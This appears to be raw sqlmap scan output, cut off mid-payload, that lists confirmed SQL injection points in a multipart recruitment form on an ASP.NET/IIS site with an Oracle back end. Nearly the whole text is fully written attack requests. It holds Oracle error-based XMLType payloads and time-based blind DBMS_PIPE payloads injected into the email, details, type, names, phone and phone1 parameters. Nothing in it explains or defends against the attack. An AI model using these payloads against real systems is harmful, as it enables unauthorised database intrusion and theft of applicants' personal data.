����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART email ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com'||(SELECT 'UzxQ' FROM DUAL WHERE 2668=2668 AND 5905=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5905=5905) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com'||(SELECT 'RVVS' FROM DUAL WHERE 8308=8308 AND 5543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(116)||CHR(83)||CHR(70),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART details ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'uqLE' FROM DUAL WHERE 4248=4248 AND 2975=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2975=2975) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd'||(SELECT 'oAQB' FROM DUAL WHERE 9489=9489 AND 5017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(72)||CHR(79)||CHR(108),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: type (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: type=3'||(SELECT 'pVJN' FROM DUAL WHERE 5132=5132 AND 8870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8870=8870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: type=3'||(SELECT 'MWEP' FROM DUAL WHERE 8072=8072 AND 6755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(77)||CHR(80)||CHR(121),5))||'
Parameter: MULTIPART names ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'vYVe' FROM DUAL WHERE 1452=1452 AND 9762=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9762=9762) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc'||(SELECT 'ekop' FROM DUAL WHERE 6976=6976 AND 4438=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(76)||CHR(68)||CHR(119),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone1 ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'dmzn' FROM DUAL WHERE 8179=8179 AND 3342=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (3342=3342) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321'||(SELECT 'kbgB' FROM DUAL WHERE 8921=8921 AND 9828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(113)||CHR(113)||CHR(84),5))||'
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Parameter: MULTIPART phone ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKMTYxNDAzMTAwMw9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYEAgMPEBYGHg1EYXRhVGV4dEZpZWxkBQxyZWNydWl0X25hbWUeDkRhdGFWYWx1ZUZpZWxkBQxyZWNydWl0X25hbWUeC18hRGF0YUJvdW5kZxAVBxJORVTkuK3nuqflt6XnqIvluIgY5Zu96ZmF5py656Wo6ZSA5ZSu5Luj6KGoD1RNQ+mUgOWUrue7j+eQhgnlh7rnpajlkZgTSkFWQeS4ree6p+W3peeoi+W4iBjmnLrnpajlm6LpmJ/plIDllK7kuJPlkZgY5py656Wo6L+Q5Lu35b2V5YWl5LiT5ZGYFQcSTkVU5Lit57qn5bel56iL5biIGOWbvemZheacuuelqOmUgOWUruS7o+ihqA9UTUPplIDllK7nu4/nkIYJ5Ye656Wo5ZGYE0pBVkHkuK3nuqflt6XnqIvluIgY5py656Wo5Zui6Zif6ZSA5ZSu5LiT5ZGYGOacuuelqOi/kOS7t+W9leWFpeS4k+WRmBQrAwdnZ2dnZ2dnZGQCDQ8PZBYCHghvbmNoYW5nZQXOAWlmKC9eLitcLihodG1sfHhsc3xkb2N8dHh0fGpwZ3wpJC9pLnRlc3QodGhpcy52YWx1ZS50b0xvd2VyQ2FzZSgpKSl7cmV0dXJuIHRydWU7fWVsc2Uge2FsZXJ0KCflr7nkuI3otbfvvIwg5LiK5Lyg55qE5qC85byP5LiN5Yy56YWN77yM6K+35LiK5LygaHRtbHxkb2N8dHh0fHhsc3xqcGfmoLzlvI/vvIEnKTt0aGlzLm91dGVySFRNTD10aGlzLm91dGVySFRNTDt9ZGQ09zXKk0A9Swb5f8dUoCYcFGGubA==
-----------------------------643024530396
Content-Disposition: form-data; name="names"
abc
-----------------------------643024530396
Content-Disposition: form-data; name="employment"
NET?D??1��3����|
-----------------------------643024530396
Content-Disposition: form-data; name="phone"
13122223333'||(SELECT 'NHOb' FROM DUAL WHERE 2799=2799 AND 5308=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5308=5308) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL))||'
-----------------------------643024530396
Content-Disposition: form-data; name="phone1"
13112344321
-----------------------------643024530396
Content-Disposition: form-data; name="email"
1@q.com
-----------------------------643024530396
Content-Disposition: form-data; name="type"
0
-----------------------------643024530396
Content-Disposition: form-data; name="details"
asd
-----------------------------643024530396
Content-Disposition: form-data; name="uploadfile"; filename=""
Content-Type: application/octet-stream
-----------------------------643024530396
Content-Disposition: form-data; name="btnOk"
����???����Y
-----------------------------643024530396
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWCALkt+CtAgLeqs/kCwKqueeGAgKwgbuWDQKwgf+XDQKyzcaDDQLyv478DQL9kpmPAbomX9L3RIM5mcEynDzi1W4f8DaL
-----------------------------643024530396--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: -----------------------------643024530396
Content-Disposition: form-data; name="__VIEWSTATE"
